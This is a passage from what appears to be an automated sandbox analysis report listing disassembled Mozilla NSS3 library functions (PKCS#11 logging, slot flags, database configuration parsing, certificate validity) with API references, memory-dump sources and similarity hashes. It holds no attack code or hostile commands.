                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C728F71
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C728F80
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C728F96
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C728FB2
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C728FCD
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C729047
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                                                                                          • String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey
                                                                                                                                                                                                                                                                                          • API String ID: 1003633598-4293906258
                                                                                                                                                                                                                                                                                          • Opcode ID: c3e6d4350129a651abadfd053c17a310749861a2b9a3fb6bc7a0e64d9bae1db3
                                                                                                                                                                                                                                                                                          • Instruction ID: 877850f283d908143157a8244517e8a19899b68ade35954bc0f859bcd56d4b02
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c3e6d4350129a651abadfd053c17a310749861a2b9a3fb6bc7a0e64d9bae1db3
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B451A172A01105ABDB209F149F4CF9B77B6AB4230DF484436E5086BB12DB7DA958CBD1
                                                                                                                                                                                                                                                                                          Function 6C754C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C744F51,00000000), ref: 6C754C50
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C744F51,00000000), ref: 6C754C5B
                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(6C82AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C744F51,00000000), ref: 6C754C76
                                                                                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C744F51,00000000), ref: 6C754CAE
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C754CC9
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C754CF4
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C754D0B
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C744F51,00000000), ref: 6C754D5E
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C744F51,00000000), ref: 6C754D68
                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C754D85
                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C754DA2
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C754DB9
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C754DCF
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                                                                                                          • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                                                                                                          • API String ID: 3756394533-2552752316
                                                                                                                                                                                                                                                                                          • Opcode ID: 8ddef87408f87451a4626457a326e3a152714fcb5adb1577a32d9a5fc9575544
                                                                                                                                                                                                                                                                                          • Instruction ID: 0816a3ad8c565a3e32614788e72599537ee5ab58fc293946b02ec5f96bc9ee37
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ddef87408f87451a4626457a326e3a152714fcb5adb1577a32d9a5fc9575544
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3841A0F19002456BEB229F149D49ABF3669AF8230CF958534EC064B702EB35D878D7D3
                                                                                                                                                                                                                                                                                          Function 6C736CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C736910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C736943
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C736910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C736957
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C736910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C736972
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C736910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C736983
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C736910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C7369AA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C736910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C7369BE
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C736910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C7369D2
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C736910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C7369DF
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C736910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C736A5B
                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C736D8C
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C736DC5
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C736DD6
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C736DE7
                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C736E1F
                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C736E4B
                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C736E72
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C736EA7
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C736EC4
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C736ED5
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C736EE3
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C736EF4
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C736F08
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C736F35
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C736F44
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C736F5B
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C736F65
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C736C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C73781D,00000000,6C72BE2C,?,6C736B1D,?,?,?,?,00000000,00000000,6C73781D), ref: 6C736C40
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C736C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C73781D,?,6C72BE2C,?), ref: 6C736C58
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C736C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C73781D), ref: 6C736C6F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C736C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C736C84
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C736C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C736C96
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C736C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C736CAA
                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C736F90
                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C736FC5
                                                                                                                                                                                                                                                                                          • PK11_GetInternalKeySlot.NSS3 ref: 6C736FF4
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                                                                                                          • String ID: +`tl
                                                                                                                                                                                                                                                                                          • API String ID: 1304971872-301444482
                                                                                                                                                                                                                                                                                          • Opcode ID: bb9db25ecf7c28f78bb4a25c2d823cda5cb7318f81b1bf14d50b719e735c0c84
                                                                                                                                                                                                                                                                                          • Instruction ID: 1df0a8ff5d8aa9dd7057afe242d11907e7985cbc21b23e84605657e220b3eea7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb9db25ecf7c28f78bb4a25c2d823cda5cb7318f81b1bf14d50b719e735c0c84
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 00B16EB1E012299BDF11DBA5DE45B9E7BB8BF0524CF141034E818E7642E731EA18CBA1
                                                                                                                                                                                                                                                                                          Function 6C6FDDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C6FDDDE
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6F87ED,00000800,6C6EEF74,00000000), ref: 6C751000
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PR_NewLock.NSS3(?,00000800,6C6EEF74,00000000), ref: 6C751016
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C750FF0: PL_InitArenaPool.NSS3(00000000,security,6C6F87ED,00000008,?,00000800,6C6EEF74,00000000), ref: 6C75102B
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C6FDDF5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C6FDE34
                                                                                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C6FDE93
                                                                                                                                                                                                                                                                                          • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6C6FDE9D
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6FDEB4
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C6FDEC3
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C6FDED8
                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s%s,?,?), ref: 6C6FDEF0
                                                                                                                                                                                                                                                                                          • PR_smprintf.NSS3(6C82AAF9,(NULL) (Validity Unknown)), ref: 6C6FDF04
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6FDF13
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C6FDF22
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C6FDF33
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6FDF3C
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6FDF4B
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C6FDF74
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6FDF8E
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                                                                                                                                                                                                                                                          • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                                                                                                                                                                                                                                                          • API String ID: 1882561532-3437882492
                                                                                                                                                                                                                                                                                          • Opcode ID: 315f7af14b14d63108a1e0c79080048ed486bb3c468cc27d11b184d6d3ee8719
                                                                                                                                                                                                                                                                                          • Instruction ID: 4c61e831aaf22cd6eff279c6eb5eac2cc6c57abc2e7868d2862e08bfbf221cbe
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 315f7af14b14d63108a1e0c79080048ed486bb3c468cc27d11b184d6d3ee8719
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 125104B1E011059BEB10DF658D45AAF7BF9AF85358F144438E819E7700E730E816CBE6
                                                                                                                                                                                                                                                                                          Function 6C732D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C732DEC
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C732E00
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C732E2B
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C732E43
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C704F1C,?,-00000001,00000000,?), ref: 6C732E74
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C704F1C,?,-00000001,00000000), ref: 6C732E88
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C732EC6
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C732EE4
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C732EF8
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C732F62
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C732F86
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6C732F9E
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C732FCA
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C73301A
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C73302E
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C733066
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C733085
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C7330EC
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C73310C
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6C733124
                                                                                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C73314C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C719180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C74379E,?,6C719568,00000000,?,6C74379E,?,00000001,?), ref: 6C71918D
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C719180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C74379E,?,6C719568,00000000,?,6C74379E,?,00000001,?), ref: 6C7191A0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07AD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07CD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C67204A), ref: 6C6E07D6
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C67204A), ref: 6C6E07E4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,6C67204A), ref: 6C6E0864
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C6E0880
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C67204A), ref: 6C6E08CB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(?,?,6C67204A), ref: 6C6E08D7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E07A0: TlsGetValue.KERNEL32(?,?,6C67204A), ref: 6C6E08FB
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C73316D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3383223490-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 02f2371bbbdf20d943400a48e7b48b2f30be5c79e5e5c60af2384407e086168f
                                                                                                                                                                                                                                                                                          • Instruction ID: fc985621e208875950303c20eaa9b90f47686e51033072994f18b67a6ff25d88
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 02f2371bbbdf20d943400a48e7b48b2f30be5c79e5e5c60af2384407e086168f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ABF1CEB1D00218AFDF10DF64D989B9ABBB4BF09318F145169EC08A7712E735E895CBC1
                                                                                                                                                                                                                                                                                          Function 6C72AF20 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(C_SignMessage), ref: 6C72AF46
                                                                                                                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C72AF74
                                                                                                                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C72AF83
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C80D930: PL_strncpyz.NSS3(?,?,?), ref: 6C80D963
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C72AF99
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C72AFBE
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C72AFD9
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C72AFF4
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C72B00F
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C72B028
                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C72B041
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
